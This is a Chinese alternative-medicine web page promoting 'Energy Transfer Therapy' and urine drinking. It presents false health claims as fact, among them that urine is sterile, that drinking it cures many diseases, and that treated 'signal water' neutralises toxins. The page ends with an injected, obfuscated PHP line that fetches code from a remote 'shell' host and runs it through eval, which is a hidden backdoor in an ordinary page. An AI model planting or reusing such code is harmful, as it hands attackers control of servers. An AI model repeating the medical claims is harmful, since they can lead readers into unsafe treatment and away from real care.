收藏本站
首頁 arrow 另類醫學簡介 arrow 能量轉換療法 (Energy Transfer Therapy)
能量轉換療法 (Energy Transfer Therapy) 列印 E-mail
能量轉換療法Energy Transfer Therapy
將引起病患不適症狀之物,透過能量轉換機,將該物之訊號以正向波或反向波的方式轉換至水中,然後讓病患喝下訊號水來治療的一種方式。

特定訊號精準治療
與順勢療法有著類似概念的能量轉換療法,係基於物理學的概念,認為任何物質均可抓出它們的訊號,並轉換到另一個物質上,例如水。對於不好的物質,我們可以將物質訊號轉換為負向訊號,即反波,能馬上中和物質不好的部份;而與物質同樣的正向訊號,帶有物質同樣的功能,則稱為正波,可強化或補充物質的能量。

能量轉換改變尿療法
舉個廣為人知的尿療法為例,其理論就是能量轉換療法的一種;喝下自己的尿液治療自身的疾病,以保持身體健康或達到養生效果。尿液是腎臟過濾後的無菌水,喝了無害,而且尿液裡含有人體大量的廢物,喝下這些廢物,可以刺激人體產生抗體,可以養護自己的細胞與病魔作戰,自然可增強自癒力和免疫系統的功能,治好多種病症。

尿療法臨床實例正波反波一喝就有效
身體健康、免疫機制功能強的人,喝下尿液的正波,具有刺激免疫功能、增強抵抗力及保養的作用;但若為治療,則需製作尿液的反波來平衡體內毒素,恢復健康。例如林小姐因長期頭痛或肩頸痛來就醫,我便以她的尿液做能量轉換的反波水讓她喝下,經年困擾她的頭痛便消失無蹤。

可做為輔助支持性療法
能量轉換療法,可以做為主流醫學一個很好的輔助支持性療法,應用如下:
尿液的正波:將尿液中的毒素以正波傳輸至水中,患者飲用後可激發身體的免疫功
能,達到保護及保養的作用。
尿液的反波:將尿液中的毒素以反波傳輸至水中,患者飲用後可中和身體的毒素,恢
復健康。
藥物及食物的反波:將產生過敏的藥物或食物以反波傳輸至水中,患者飲用後可以排
解體內因藥物或食物所導致的不良反應。

 
BOX 能量商品不等於能量醫學
每個人的能量狀態變化萬千,有的過多、有的不足,因此依中醫的說法,有的應「瀉」、有的應「補」。市面上所販售的「能量商品」是否真具有能量?我們尚且不論,單就使用而言,能量的「個別化差異」,怎容許用「制式」的商品為之?換句話說,大量生產的商品若以「能量」做為訴求,完全忽視個人差異,將造成適得其反的結果!
更有一些號稱專家的人常誇口說:「哇!這東西帶有很大的能量」。要知道核能也是「很大的能量」,雖然它能提供我們電力,但若是沒有保護與隔離,它是一個「傷害人」的「很大的能量」。所以所謂能量商品,與真正合乎現代科學要求的能量醫學之間,仍存在極大的差距,更何況能量之真假難辨!消費大眾應慎重尋求合格的醫師來執行較為妥當。


所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】
 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));